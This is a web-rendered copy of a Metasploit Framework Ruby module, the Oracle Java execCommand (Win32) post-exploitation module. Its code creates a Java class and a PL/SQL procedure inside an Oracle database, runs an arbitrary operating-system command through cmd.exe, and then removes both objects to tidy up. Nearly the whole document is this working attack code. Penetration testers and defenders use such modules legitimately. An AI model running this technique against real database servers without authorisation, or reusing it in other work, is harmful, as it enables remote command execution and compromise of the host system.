CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/admin/oracle/post_exploitation/win32exec.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Auxiliary

7
  include Msf::Exploit::ORACLE

8


9
  def initialize(info = {})

10
    super(update_info(info,

11
      'Name'           => 'Oracle Java execCommand (Win32)',

12
      'Description'    => %q{

13
          This module will create a java class which enables the execution of OS commands.

14
      },

15
      'Author'         => [ 'MC' ],

16
      'License'        => MSF_LICENSE,

17
      'References'     =>

18
        [

19
          [ 'URL', 'https://www.metasploit.com/users/mc' ],

20
        ],

21
      'DisclosureDate' => '2007-12-07'))

22


23
      register_options(

24
        [

25
          OptString.new('CMD', [ false, 'The OS command to execute.',  'echo metasploit > %SYSTEMDRIVE%\\\\unbreakable.txt']),

26
        ])

27
  end

28


29
  def run

30
    return if not check_dependencies

31


32
    source = Rex::Text.rand_text_alpha_upper(rand(10) + 1)

33
    name   = Rex::Text.rand_text_alpha_upper(rand(10) + 1)

34


35
    java = "

36
      create or replace and resolve java source named \"#{source}\" as

37
      import java.lang.*;

38
      import java.io.*;

39
      public class #{source}

40
      {

41
      public static void execCommand (String command) throws IOException

42
      {

43
      Runtime.getRuntime().exec(command);

44
      }

45
      };

46
      "

47


48
    procedure = "

49
      create or replace procedure #{name} (p_command in varchar2)

50
      as language java

51
      name '#{source}.execCommand (java.lang.String)';

52
      "

53


54
    exec      = "begin #{name}('cmd.exe /c #{datastore['CMD']}'); end;"

55


56
    drops     = "drop java source #{source}"

57


58
    dropp     = "drop procedure #{name}"

59


60
    begin

61
      print_status("Creating java source '#{source}'...")

62
      prepare_exec(java)

63
    rescue => e

64
      return

65
    end

66


67
    print_status("Creating procedure '#{name}'...")

68
    prepare_exec(procedure)

69


70
    print_status("Sending command: '#{datastore['CMD']}'")

71
    prepare_exec(exec)

72


73
    print_status("Removing java source '#{source}'...")

74
    prepare_exec(drops)

75


76
    print_status("Removing procedure '#{name}'...")

77
    prepare_exec(dropp)

78


79
  end

80
end

81


82